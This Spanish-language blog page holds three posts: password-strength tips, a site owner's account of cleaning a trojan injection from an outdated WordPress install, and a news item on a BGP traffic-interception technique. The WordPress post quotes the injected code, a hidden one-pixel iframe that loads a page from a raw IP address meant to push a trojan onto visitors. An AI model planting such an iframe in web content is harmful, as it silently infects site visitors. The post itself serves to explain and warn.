23 agosto 2011

Cómo crear una contraseña segura.

Filed under: General — Etiquetas: , , , , , , , — Txema @ 10:38

Hoy en día, la mayoría de los sistemas de información y acceso a sitios web nos solicitan introducir datos de usuario y una contraseña como forma de acceso e identificación.

Podría decirse que esta contraseña es la única barrera que protege nuestros datos confidenciales y la información que almacenamos en nuestro equipo o programa.

La contraseña es el nivel de seguridad más básico del cual disponemos, una palabra secreta que, en términos informáticos, permite el acceso a nuestro ordenador, programa o web de forma autorizada.

A pesar de ser conscientes de ello, actualmente son muy pocos los usuarios que dedican algo de tiempo y esfuerzo a crear contraseñas seguras. Según los últimos estudios, “1234“, “password” o el propio nombre de usuario, son las claves más utilizadas. Sin duda, un gran error que facilita el trabajo a los hackers.

¿Qué debe tener una contraseña para ser segura?

•8 caracteres como mínimo
•Números
•Letras
•Mayúsculas y minúsculas
•Símbolos (no es obligatorio)

Recomendaciones:

•Excluir nombres o fechas relacionadas con el usuario (fecha o lugar de nacimiento, nombre la pareja o mascota, etc) que cualquier atacante podría conocer tras investigar información a cerca de nosotros en la Red.
•Evitar referencias directas al nombre de nuestra empresa.
•No seguir patrones como qwerty, 1234, qwerty1, etc, o “lenguaje hacker” como “s3rg10″ de Sergio.
•No utilizar la misma contraseña para diferentes accesos, ya que en el caso de robo, facilitaríamos la entrada a más de un sitio.

Share on Facebook

2 mayo 2009

Y me colaron un troyano.

Filed under: Webs — Etiquetas: , , , — Txema @ 8:52
Funciona con WordPress.

Funciona con WordPress.

En realidad no me refiero a que me colasen un troyano en mi computadora, uso un antivirus gratuito que se actualiza a diario y da muy buenos resultados, se llama Avast, francamente se lo recomiendo a cualquiera, donde me colaron el virus fue en una de mis paginas, pero me di cuenta enseguida y ya esta corregido.

Realmente la culpa se puede decir que fue mía, la pagina atacada funciona con WordPress y no había actualizado el script hacia algún tiempo por lo que estaba funcionando con la versión 2.6 cuando la actual es la 2.7.1 y, claro esta, tenia funcionando un sitio con un script php que tiene bugs conocidos.

Además debería haber estado mas atento ya que esta web recibe una cantidad de spam impresionante, 100 envíos diarios intentan colar su publicad indeseable en este sitio, lógicamente lo logran nunca ya que uso el Akismet, un conocido plugin para evitar el spam, y además modero todos los artículos, nada puede ser publicado si no lo aprueba antes una persona.

Y como la web estaba desactualizada la solución que tome fue a la tremenda, use la opción de exportar para obtener un fichero con todos los artículos de ese sitio y eliminar los rastros del virus en esos artículos, lo borre completamente, borre también la base de datos completa y monte el sitio de nuevo partiendo desde cero, cambiando de paso todas las contraseñas, en realidad no cuesta demasiado hacer todo esto y de esa manera me aseguraba que no quedaba ningún resquicio de seguridad.

Como opte por la solución anterior no me tome la molestia de averiguar datos concretos del ataque, aunque para limpiar los artículos tuve que ver como actuaba el virus para esconderse dentro de los artículos, se camuflaba como si fuese una etiqueta de un servicio de estadísticas para WordPress de la siguiente manera:

<!– Web Stats –> <!– End Web Stats –>

Y entre las dos etiquetas anteriores te metía un iframe usando este código web:

<iframe src=http://74.222.134.170/stats.php?id=2 width=1 height=1 frameborder=0></iframe>

Para los que no sepáis lo que es un iframe os lo explico, es como si se abriese una pagina web dentro de otra pagina web, se le puede indicar el tamaño, en este caso el tamaño lo especifica donde pone  “width=1 height=1” que seria un píxel por un píxel, por lo que en la web atacada pasa desapercibido ya que solo se ve un puntito, pero en ese puntito abre una web que intenta descargar un troyano en el ordenador de la persona que esta navegando por esa pagina web, pero tampoco os asuntéis demasiado, teniendo instalado y actualizado un antivirus en el ordenador os evitara esta clase de problemas.

Además de infectar algunos artículos me di cuenta de que había ficheros “de mas” en el WordPress, concretamente uno era “wp-stats.php”, así que por eso en vez de actualizar preferí borrar y ponerlo todo de nuevo.

Si tenéis curiosidad por visitar el sitio atacado, que os recuerdo que ya esta limpio y se puede visitar sin ningún problema, podéis hacerlo visitando la siguiente url:

http://www.Notas.com.es

Share on Facebook

30 agosto 2008

Grave agujero de seguridad en internet.

Filed under: General — Etiquetas: , , — ADSL @ 19:50

Poco más de un mes le ha durado al informático Dan Kaminsky el honor de haber descubierto el «fallo de seguridad más grave de internet». Concretamente 38 días son los que han tardado en evidenciar otra notable vulnerabilidad en la red, tanto o más que la anterior. Ha sido durante la convención de seguridad «DefCon» que se celebra anualmente en Las Vegas (EE.UU.). Los expertos en seguridad Anton Kapela y Alex Pilosov demostraron su capacidad para interceptar toda información que circule por internet y modificarla antes de llegar a destino.

El nuevo agujero se encuentra en el BGP, un protocolo de la red concebido en los años 70 para que servicios de inteligencia o autoridades gubernamentales pudiesen intervenir datos sin necesidad de pedir autorización a terceros. Se suponía que este protocolo presentaba teóricos agujeros de seguridad, pero hasta ahora nadie había sido capaz de sacar provecho de ellos.

Confianza ciega.

El problema es que la arquitectura del sistema BGP se basa en la confianza. A grandes rasgos, éste es el sistema que decide cual es el camino más corto entre emisor y receptor cuando, por ejemplo, se envía un correo electrónico. Una vez se remiten los datos, el servidor de destino informa al de origen de la ruta más efectiva para la transmisión, aceptando por defecto que la información es veraz. La técnica concebida por Kapela y Pilosov, llamada «AS Path Prepending», se vale de esta confianza ciega para redirigir los paquetes de datos a la dirección deseada. «No es un error, ni un fallo del protocolo, es que el sistema funciona así», explica Kapela. Los días que el tráfico en internet es normal,las direcciones permanecen estáticas; pero cuando hay «atasco» de datos, los servidores necesitan redirigir los paquetes de datos a direcciones alternativas, momento donde el protocolo BGP es muy vulnerable.

Si no es un problema de software… ¿quién y cómo puede arreglarlo? «Los proveedores de internet pueden prevenir el ataque al cien por ciento -considera Kapela- filtrando la información. Simplemente no lo hacen por el alto coste en dinero y tiempo que implicaría realizarlo a nivel global». Existe, además de los motivos enunciados, un tercero de mucho peso. Y es que para tapar el «agujero», los proveedores deberían cooperar a nivel mundial en las tareas de filtrado. Esto significaría compartir las direcciones IP de todos sus clientes con la competencia, algo que muchas empresas no están dispuestas a hacer.En el proceso podría aparecer también la paranoia colectiva: con que una compañía no hiciese sus «deberes» correctamente, el resto volverían a quedar expuestas.

Share on Facebook

Este blog es propiedad de Txema.Net debes dirigirte a esa web para aceptar el aviso legal.